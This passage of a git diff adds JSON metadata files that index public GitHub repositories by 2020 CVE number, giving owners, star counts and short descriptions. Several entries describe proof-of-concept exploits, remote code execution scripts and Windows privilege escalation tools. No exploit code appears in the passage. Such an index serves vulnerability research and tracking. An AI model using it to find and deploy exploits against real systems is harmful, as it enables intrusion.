"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-10130", + "description": "CVE-2020-10130 - SearchBlox Product before V-9.1 is vulnerable to Business logic bypass", + "fork": false, + "created_at": "2023-08-11T09:26:52Z", + "updated_at": "2023-08-11T09:49:02Z", + "pushed_at": "2023-08-11T09:29:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10131.json b/2020/CVE-2020-10131.json new file mode 100644 index 0000000000..b726a1774a --- /dev/null +++ b/2020/CVE-2020-10131.json @@ -0,0 +1,33 @@ +[ + { + "id": 677323193, + "name": "CVE-2020-10131", + "full_name": "InfoSec4Fun\/CVE-2020-10131", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-10131", + "description": "CVE-2020-10131 - SearchBlox Product before V-9.2.1 is Vulnerable to CSV macro injection.", + "fork": false, + "created_at": "2023-08-11T09:31:15Z", + "updated_at": "2023-08-11T09:49:49Z", + "pushed_at": "2023-08-11T09:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10132.json b/2020/CVE-2020-10132.json new file mode 100644 index 0000000000..81bc1359e7 --- /dev/null +++ b/2020/CVE-2020-10132.json @@ -0,0 +1,33 @@ +[ + { + "id": 677324298, + "name": "CVE-2020-10132", + "full_name": "InfoSec4Fun\/CVE-2020-10132", + "owner": { + "login": "InfoSec4Fun", + "id": 59775675, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59775675?v=4", + "html_url": "https:\/\/github.com\/InfoSec4Fun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/InfoSec4Fun\/CVE-2020-10132", + "description": "CVE-2020-10132 - SearchBlox product before V-9.1 is vulnerable to CORS misconfiguration.", + "fork": false, + "created_at": "2023-08-11T09:34:34Z", + "updated_at": "2023-08-11T09:50:32Z", + "pushed_at": "2023-08-11T09:38:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10135.json b/2020/CVE-2020-10135.json new file mode 100644 index 0000000000..357dd53833 --- /dev/null +++ b/2020/CVE-2020-10135.json @@ -0,0 +1,33 @@ +[ + { + "id": 268573655, + "name": "CVE-2020-10135-BIAS", + "full_name": "m4rm0k\/CVE-2020-10135-BIAS", + "owner": { + "login": "m4rm0k", + "id": 3755563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3755563?v=4", + "html_url": "https:\/\/github.com\/m4rm0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m4rm0k\/CVE-2020-10135-BIAS", + "description": "CVE 2020-10135 a.k.a BIAS (Bluetooth Impersonation Attack)", + "fork": false, + "created_at": "2020-06-01T16:25:49Z", + "updated_at": "2020-06-01T16:25:51Z", + "pushed_at": "2020-06-01T10:11:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10148.json b/2020/CVE-2020-10148.json new file mode 100644 index 0000000000..a951a033c8 --- /dev/null +++ b/2020/CVE-2020-10148.json @@ -0,0 +1,64 @@ +[ + { + "id": 325174671, + "name": "CVE-2020-10148-Solarwinds-Orion", + "full_name": "rdoix\/CVE-2020-10148-Solarwinds-Orion", + "owner": { + "login": "rdoix", + "id": 59075479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59075479?v=4", + "html_url": "https:\/\/github.com\/rdoix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rdoix\/CVE-2020-10148-Solarwinds-Orion", + "description": null, + "fork": false, + "created_at": "2020-12-29T03:17:56Z", + "updated_at": "2021-01-16T07:53:53Z", + "pushed_at": "2020-12-29T03:30:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 327010904, + "name": "CVE-2020-10148", + "full_name": "B1anda0\/CVE-2020-10148", + "owner": { + "login": "B1anda0", + "id": 74232513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4", + "html_url": "https:\/\/github.com\/B1anda0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1anda0\/CVE-2020-10148", + "description": "SolarWinds Orion API 远程代码执行漏洞批量检测脚本", + "fork": false, + "created_at": "2021-01-05T13:42:36Z", + "updated_at": "2023-02-26T04:18:15Z", + "pushed_at": "2021-01-05T13:56:11Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1015.json b/2020/CVE-2020-1015.json new file mode 100644 index 0000000000..3ee38ecc68 --- /dev/null +++ b/2020/CVE-2020-1015.json @@ -0,0 +1,33 @@ +[ + { + "id": 263687891, + "name": "cve-2020-1015", + "full_name": "0xeb-bp\/cve-2020-1015", + "owner": { + "login": "0xeb-bp", + "id": 53204152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53204152?v=4", + "html_url": "https:\/\/github.com\/0xeb-bp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeb-bp\/cve-2020-1015", + "description": "PoC for CVE-2020-1015", + "fork": false, + "created_at": "2020-05-13T16:42:17Z", + "updated_at": "2024-10-29T16:00:07Z", + "pushed_at": "2020-05-16T05:15:35Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10189.json b/2020/CVE-2020-10189.json new file mode 100644 index 0000000000..51a3412b29 --- /dev/null +++ b/2020/CVE-2020-10189.json @@ -0,0 +1,33 @@ +[ + { + "id": 312147451, + "name": "CVE-2020-10189-ManageEngine", + "full_name": "zavke\/CVE-2020-10189-ManageEngine", + "owner": { + "login": "zavke", + "id": 18608477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18608477?v=4", + "html_url": "https:\/\/github.com\/zavke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zavke\/CVE-2020-10189-ManageEngine", + "description": null, + "fork": false, + "created_at": "2020-11-12T02:36:09Z", + "updated_at": "2022-09-22T12:49:54Z", + "pushed_at": "2020-11-12T02:37:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10199.json b/2020/CVE-2020-10199.json new file mode 100644 index 0000000000..62db60c7bb --- /dev/null +++ b/2020/CVE-2020-10199.json @@ -0,0 +1,192 @@ +[ + { + "id": 253799743, + "name": "CVE-2020-10199-10204", + "full_name": "wsfengfan\/CVE-2020-10199-10204", + "owner": { + "login": "wsfengfan", + "id": 33821840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33821840?v=4", + "html_url": "https:\/\/github.com\/wsfengfan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wsfengfan\/CVE-2020-10199-10204", + "description": "CVE-2020-10199 CVE-2020-10204 Python POC", + "fork": false, + "created_at": "2020-04-07T13:23:12Z", + "updated_at": "2024-08-12T19:59:52Z", + "pushed_at": "2020-04-07T13:56:17Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 254017759, + "name": "CVE-2020-10199", + "full_name": "jas502n\/CVE-2020-10199", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-10199", + "description": "CVE-2020-10199、CVE-2020-10204、CVE-2020-11444", + "fork": false, + "created_at": "2020-04-08T07:36:30Z", + "updated_at": "2024-08-12T19:59:53Z", + "pushed_at": "2020-04-09T00:36:18Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 254064445, + "name": "CVE-2020-10199_CVE-2020-10204", + "full_name": "magicming200\/CVE-2020-10199_CVE-2020-10204", + "owner": { + "login": "magicming200", + "id": 23466759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23466759?v=4", + "html_url": "https:\/\/github.com\/magicming200", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/magicming200\/CVE-2020-10199_CVE-2020-10204", + "description": "CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.", + "fork": false, + "created_at": "2020-04-08T11:08:35Z", + "updated_at": "2024-11-12T10:16:12Z", + "pushed_at": "2020-04-12T13:38:19Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "nexus", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 256171633, + "name": "CVE-2020-10199_POC-EXP", + "full_name": "zhzyker\/CVE-2020-10199_POC-EXP", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2020-10199_POC-EXP", + "description": "CVE-2020-10199 Nexus <= 3.21.1 远程代码执行脚本(有回显)", + "fork": false, + "created_at": "2020-04-16T09:40:15Z", + "updated_at": "2024-08-12T20:00:15Z", + "pushed_at": "2020-05-26T10:23:34Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 264111461, + "name": "CVE-2020-10199", + "full_name": "aleenzz\/CVE-2020-10199", + "owner": { + "login": "aleenzz", + "id": 42509259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42509259?v=4", + "html_url": "https:\/\/github.com\/aleenzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleenzz\/CVE-2020-10199", + "description": "CVE-2020-10199 回显版本", + "fork": false, + "created_at": "2020-05-15T06:12:51Z", + "updated_at": "2022-11-09T18:07:45Z", + "pushed_at": "2024-06-24T15:27:10Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 31, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 653129900, + "name": "CVE-2020-10199-Nexus-3.21.01", + "full_name": "hugosg97\/CVE-2020-10199-Nexus-3.21.01", + "owner": { + "login": "hugosg97", + "id": 89896905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89896905?v=4", + "html_url": "https:\/\/github.com\/hugosg97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hugosg97\/CVE-2020-10199-Nexus-3.21.01", + "description": "Sonatype Nexus 3.21.01 - Remote Code Execution (Authenticated - Updated)", + "fork": false, + "created_at": "2023-06-13T13:10:31Z", + "updated_at": "2023-06-13T13:22:41Z", + "pushed_at": "2023-06-13T13:39:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1020.json b/2020/CVE-2020-1020.json new file mode 100644 index 0000000000..452efaa527 --- /dev/null +++ b/2020/CVE-2020-1020.json @@ -0,0 +1,64 @@ +[ + { + "id": 375592829, + "name": "CVE-2020-1020-Exploit", + "full_name": "CrackerCat\/CVE-2020-1020-Exploit", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2020-1020-Exploit", + "description": null, + "fork": false, + "created_at": "2021-06-10T06:23:59Z", + "updated_at": "2024-08-12T20:13:48Z", + "pushed_at": "2021-05-18T07:57:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 394509870, + "name": "CVE-2020-1020", + "full_name": "KaLendsi\/CVE-2020-1020", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2020-1020", + "description": "Windows Font Driver Type 1 VToHOrigin stack corruption", + "fork": false, + "created_at": "2021-08-10T03:10:39Z", + "updated_at": "2024-08-12T20:15:27Z", + "pushed_at": "2021-08-10T07:27:41Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10204.json b/2020/CVE-2020-10204.json new file mode 100644 index 0000000000..3157711c3d --- /dev/null +++ b/2020/CVE-2020-10204.json @@ -0,0 +1,33 @@ +[ + { + "id": 267244129, + "name": "CVE-2020-10204", + "full_name": "zhzyker\/CVE-2020-10204", + "owner": { + "login": "zhzyker", + "id": 32918050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4", + "html_url": "https:\/\/github.com\/zhzyker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhzyker\/CVE-2020-10204", + "description": "CVE-2020-10204 远程命令执行脚本", + "fork": false, + "created_at": "2020-05-27T06:55:54Z", + "updated_at": "2024-08-12T20:01:57Z", + "pushed_at": "2020-05-27T07:10:19Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10238.json b/2020/CVE-2020-10238.json new file mode 100644 index 0000000000..3aae53b7ec --- /dev/null +++ b/2020/CVE-2020-10238.json @@ -0,0 +1,33 @@ +[ + { + "id": 245067850, + "name": "CVE-2020-10238", + "full_name": "HoangKien1020\/CVE-2020-10238", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-10238", + "description": "CVE-2020-10238: Incorrect Access Control in com_templates PoC", + "fork": false, + "created_at": "2020-03-05T04:23:12Z", + "updated_at": "2024-08-12T19:58:23Z", + "pushed_at": "2020-10-22T10:05:57Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10239.json b/2020/CVE-2020-10239.json new file mode 100644 index 0000000000..2bce7a516b --- /dev/null +++ b/2020/CVE-2020-10239.json @@ -0,0 +1,33 @@ +[ + { + "id": 248937199, + "name": "CVE-2020-10239", + "full_name": "HoangKien1020\/CVE-2020-10239", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-10239", + "description": "CVE-2020-10239: Incorrect Access Control in com_fields SQL field-RCE- PoC", + "fork": false, + "created_at": "2020-03-21T08:40:40Z", + "updated_at": "2024-08-12T19:59:04Z", + "pushed_at": "2020-04-10T01:24:02Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1034.json b/2020/CVE-2020-1034.json new file mode 100644 index 0000000000..dac8903b4c --- /dev/null +++ b/2020/CVE-2020-1034.json @@ -0,0 +1,80 @@ +[ + { + "id": 315277785, + "name": "CVE-2020-1034", + "full_name": "yardenshafir\/CVE-2020-1034", + "owner": { + "login": "yardenshafir", + "id": 12428647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12428647?v=4", + "html_url": "https:\/\/github.com\/yardenshafir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yardenshafir\/CVE-2020-1034", + "description": "PoC demonstrating the use of cve-2020-1034 for privilege escalation", + "fork": false, + "created_at": "2020-11-23T10:24:07Z", + "updated_at": "2024-10-29T16:00:28Z", + "pushed_at": "2021-03-16T13:53:37Z", + "stargazers_count": 119, + "watchers_count": 119, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "privilege-escalation", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 40, + "watchers": 119, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 473326116, + "name": "CVE-2020-1034", + "full_name": "GeorgiiFirsov\/CVE-2020-1034", + "owner": { + "login": "GeorgiiFirsov", + "id": 11062067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11062067?v=4", + "html_url": "https:\/\/github.com\/GeorgiiFirsov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeorgiiFirsov\/CVE-2020-1034", + "description": "CVE 2020-1034 exploit and presentation", + "fork": false, + "created_at": "2022-03-23T19:14:26Z", + "updated_at": "2023-04-30T06:31:34Z", + "pushed_at": "2022-06-16T18:50:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-1034", + "education", + "exploit", + "research", + "vulnerability", + "winapi", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1048.json b/2020/CVE-2020-1048.json new file mode 100644 index 0000000000..8b4fa0925a --- /dev/null +++ b/2020/CVE-2020-1048.json @@ -0,0 +1,133 @@ +[ + { + "id": 264008888, + "name": "CVE-2009-0229-PoC", + "full_name": "zveriu\/CVE-2009-0229-PoC", + "owner": { + "login": "zveriu", + "id": 3428446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3428446?v=4", + "html_url": "https:\/\/github.com\/zveriu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zveriu\/CVE-2009-0229-PoC", + "description": "PoC for CVE-2009-0229 \"Print Spooler Read File Vulnerability\" LPE AFR (related to CVE-2020-1048)", + "fork": false, + "created_at": "2020-05-14T19:40:50Z", + "updated_at": "2024-09-14T22:12:59Z", + "pushed_at": "2020-05-15T11:32:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "exploits", + "poc", + "printer", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 274483148, + "name": "CVE-2020-1048", + "full_name": "shubham0d\/CVE-2020-1048", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2020-1048", + "description": "POC exploit code for CVE-2020-1048(PrintDemon)", + "fork": false, + "created_at": "2020-06-23T18:45:24Z", + "updated_at": "2024-08-12T20:03:01Z", + "pushed_at": "2020-06-25T12:22:06Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 297202950, + "name": "CVE-2020-1048", + "full_name": "Ken-Abruzzi\/CVE-2020-1048", + "owner": { + "login": "Ken-Abruzzi", + "id": 68931768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68931768?v=4", + "html_url": "https:\/\/github.com\/Ken-Abruzzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ken-Abruzzi\/CVE-2020-1048", + "description": "An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'.", + "fork": false, + "created_at": "2020-09-21T01:59:38Z", + "updated_at": "2024-05-23T16:06:48Z", + "pushed_at": "2020-09-21T03:26:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660602769, + "name": "cve-2020-1048", + "full_name": "Y3A\/cve-2020-1048", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/cve-2020-1048", + "description": "spoolsv.exe arb file write poc", + "fork": false, + "created_at": "2023-06-30T11:36:10Z", + "updated_at": "2023-06-30T11:36:30Z", + "pushed_at": "2023-06-30T11:36:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1054.json b/2020/CVE-2020-1054.json new file mode 100644 index 0000000000..f58abc5957 --- /dev/null +++ b/2020/CVE-2020-1054.json @@ -0,0 +1,126 @@ +[ + { + "id": 272832083, + "name": "cve-2020-1054", + "full_name": "0xeb-bp\/cve-2020-1054", + "owner": { + "login": "0xeb-bp", + "id": 53204152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53204152?v=4", + "html_url": "https:\/\/github.com\/0xeb-bp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeb-bp\/cve-2020-1054", + "description": "LPE for CVE-2020-1054 targeting Windows 7 x64", + "fork": false, + "created_at": "2020-06-16T23:22:15Z", + "updated_at": "2024-10-29T16:01:00Z", + "pushed_at": "2020-06-17T18:10:30Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 86, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 280822745, + "name": "CVE-2020-1054", + "full_name": "Iamgublin\/CVE-2020-1054", + "owner": { + "login": "Iamgublin", + "id": 16526066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16526066?v=4", + "html_url": "https:\/\/github.com\/Iamgublin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Iamgublin\/CVE-2020-1054", + "description": null, + "fork": false, + "created_at": "2020-07-19T08:20:57Z", + "updated_at": "2023-01-29T05:52:50Z", + "pushed_at": "2020-07-19T08:24:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 282434512, + "name": "CVE-2020-1054", + "full_name": "KaLendsi\/CVE-2020-1054", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2020-1054", + "description": null, + "fork": false, + "created_at": "2020-07-25T11:56:48Z", + "updated_at": "2024-08-12T20:04:06Z", + "pushed_at": "2020-07-27T02:43:12Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 307866361, + "name": "CVE-2020-1054", + "full_name": "Graham382\/CVE-2020-1054", + "owner": { + "login": "Graham382", + "id": 67909699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67909699?v=4", + "html_url": "https:\/\/github.com\/Graham382", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Graham382\/CVE-2020-1054", + "description": "Windows 7 LPE", + "fork": false, + "created_at": "2020-10-28T00:48:43Z", + "updated_at": "2020-10-28T06:09:12Z", + "pushed_at": "2020-10-28T00:57:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10551.json b/2020/CVE-2020-10551.json new file mode 100644 index 0000000000..59fa072b54 --- /dev/null +++ b/2020/CVE-2020-10551.json @@ -0,0 +1,42 @@ +[ + { + "id": 254115906, + "name": "CVE-2020-10551", + "full_name": "seqred-s-a\/CVE-2020-10551", + "owner": { + "login": "seqred-s-a", + "id": 49437606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49437606?v=4", + "html_url": "https:\/\/github.com\/seqred-s-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seqred-s-a\/CVE-2020-10551", + "description": "Privilege escalation in QQBrowser", + "fork": false, + "created_at": "2020-04-08T14:46:33Z", + "updated_at": "2024-08-12T19:59:54Z", + "pushed_at": "2020-04-09T08:24:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "browser", + "cve", + "cve-2020-10551", + "exploit", + "qqbrowser", + "security", + "tencent" + ], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-10558.json 